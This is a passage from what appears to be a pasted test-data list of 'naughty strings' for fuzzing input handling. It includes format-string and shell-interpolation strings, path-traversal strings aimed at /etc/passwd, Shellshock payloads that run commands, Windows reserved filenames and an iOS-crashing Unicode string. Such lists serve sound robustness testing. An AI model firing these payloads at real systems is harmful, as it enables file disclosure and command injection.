  540. # Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string.
  541.  
  542. $HOME
  543. $ENV{'HOME'}
  544. %d
  545. %s
  546. {0}
  547. %*.*s
  548.  
  549. # File Inclusion
  550. #
  551. # Strings which can cause user to pull in files that should not be a part of a web server
  552.  
  553. ../../../../../../../../../../../etc/passwd%00
  554. ../../../../../../../../../../../etc/hosts
  555.  
  556. # Known CVEs and Vulnerabilities
  557. #
  558. # Strings that test for known vulnerabilities
  559.  
  560. () { 0; }; touch /tmp/blns.shellshock1.fail;
  561. () { _; } >_[$($())] { touch /tmp/blns.shellshock2.fail; }
  562. <<< %s(un='%s') = %u
  563.  
  564. # MSDOS/Windows Special Filenames
  565. #
  566. # Strings which are reserved characters in MSDOS/Windows
  567.  
  568. CON
  569. PRN
  570. AUX
  571. CLOCK$
  572. NUL
  573. A:
  574. ZZ:
  575. COM1
  576. LPT1
  577. LPT2
  578. LPT3
  579. COM2
  580. COM3
  581. COM4
  582.  
  583. # IRC specific strings
  584. #
  585. # Strings that may occur on IRC clients that make security products freak out
  586.  
  587. DCC SEND STARTKEYLOGGER 0 0 0
  588.  
  589. # Scunthorpe Problem
  590. #
  591. # Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)
  592.  
  593. Scunthorpe General Hospital
  594. Penistone Community Church
  595. Lightwater Country Park
  596. Jimmy Clitheroe
  597. Horniman Museum
  598. shitake mushrooms
  599. RomansInSussex.co.uk
  600. http://www.cum.qc.ca/
  601. Craig Cockburn, Software Specialist
  602. Linda Callahan
  603. Dr. Herman I. Libshitz
  604. magna cum laude
  605. Super Bowl XXX
  606. medieval erection of parapets
  607. evaluate
  608. mocha
  609. expression
  610. Arsenal canal
  611. classic
  612. Tyson Gay
  613. basement
  614.  
  615. # Human injection
  616. #
  617. # Strings which may cause human to reinterpret worldview
  618.  
  619. If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you.
  620.  
  621. # Terminal escape codes
  622. #
  623. # Strings which punish the fools who use cat/type on this file
  624.  
  625. Roses are red, violets are blue. Hope you enjoy terminal hue
  626. But now...for my greatest trick...
  627. The quick brown fox... [Beeeep]
  628.  
  629. # iOS Vulnerability
  630. #
  631. # Strings which crashed iMessage in iOS versions 8.3 and earlier
  632.  
  633. Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement